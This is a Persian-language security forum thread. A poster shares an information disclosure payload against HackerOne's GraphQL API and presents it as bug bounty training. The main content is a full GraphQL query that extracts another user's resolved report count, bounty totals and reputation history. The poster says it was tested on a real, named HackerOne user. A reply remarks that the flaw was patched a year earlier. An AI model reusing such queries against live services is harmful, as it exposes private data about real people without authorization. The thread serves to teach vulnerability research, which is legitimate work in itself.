انجمن تیم امنیتی ایران سایبر

بیرون کشیدن Total Count گزارش ارسالی کاربر در Hackerone با Graphql

شروع موضوع توسط irUnd3rgr0und ‏23/5/19 در انجمن ویدیو های آموزشی آزمایشگاه امنیت

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

شرکت امنیتی ایران سایبر - برگزار کننده دوره های آموزشی و مسابقات فتح پرچم (CTF)
  1. irUnd3rgr0und
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏22/5/19
    ارسال ها:
    2
    تشکر شده:
    9
    جنسیت:
    محل سکونت:
    تهران
    Name:
    Anonymous
    Main os:
    Windows
    باسلام
    مدتهاست که فعالیت نمیکنم ولی با این حال برای یادگیری دوستان که در زمینه بانتی فعالن آموزش های لازمه رو بذارم که توانایی خودشونو محک بزنن . در این خصوص سایت Hackerone با GraphQL در حال اجراست و باتوجه به خطای اون میتونی مقادیر مختلفی رو برای مهاجم نمایش بده حال در رسته Information Disclosure قرار میگیره در response خروجی میتوین موارد مختلفی رو ببینین

    Payload :
    PHP:
    {"query":"query Relay_query_router($first_0:Int!,$last_5:Int!,$last_6:Int!,$order_by_1:TeamOrderInput!,$where_2:FiltersTeamFilterInput!,$size_3:ProfilePictureSizes!,$size_8:ProfilePictureSizes!,$where_4:FiltersReportFilterInput!,$state_7:[InvitationStateEnum]!) {query {id,...F2}} fragment F0 on User {_soft_launch_invitations2KlypH:soft_launch_invitations(state:$state_7) {total_count},id} fragment F1 on User {username,signal,reputation,impact,_profile_picture2rz4nb:profile_picture(size:$size_8),id} fragment F2 on Query {_teams1b6GWk:teams(first:$first_0,order_by:$order_by_1,where:$where_2) {edges {node {handle,name,_profile_picture1Fh783:profile_picture(size:$size_3),number_of_valid_reports_for_user,bounty_earned_for_user,currency,id},cursor},pageInfo {hasNextPage,hasPreviousPage}},user(username:\"jobert\") {id,username,reputation,_reports4B8BTM:reports(where:$where_4) {total_count},bounties {total_amount},bounties {_group_by_last_months16tviM:group_by_last_months(last:$last_5) {label,value}},reports {_group_by_resolved_last_months46VDjn:group_by_resolved_last_months(last:$last_5) {label,value}},_reputations_grouped_by_last_months41aZOE:reputations_grouped_by_last_months(last:$last_6) {label,value},...F0,...F1},id}","variables":{"first_0":5,"last_5":6,"last_6":7,"order_by_1":{"field":"bounty_earned_by_user","direction":"DESC"},"where_2":{"_or":[{"_and":[{"whitelisted_hackers":{"is_me":true}},{"state":{"_eq":"soft_launched"}}]},{"_and":[{"reporters":{"is_me":true}},{"state":{"_eq":"public_mode"}}]}]},"size_3":"medium","size_8":"large","where_4":{"substate":{"_eq":"resolved"}},"state_7":"open"}}
    بر روی کاربر jobert تست شد میبینید که خروجی Total_Count برابر 45 است.


    پسورد : iran-cyber.net
     

    پیوست ها:

    blackops، anonyanony، rajaz و 3 نفر دیگر از این ارسال تشکر کرده اند.
  2. hosthost
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏15/8/15
    ارسال ها:
    15
    تشکر شده:
    23
    Name:
    :(
    Main os:
    Windows
    ریکورد کردن روی اسیب پذیری که یک سال پیش پچ شده رو درک نمی کنم ! ولی خب موفق باشی
     
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .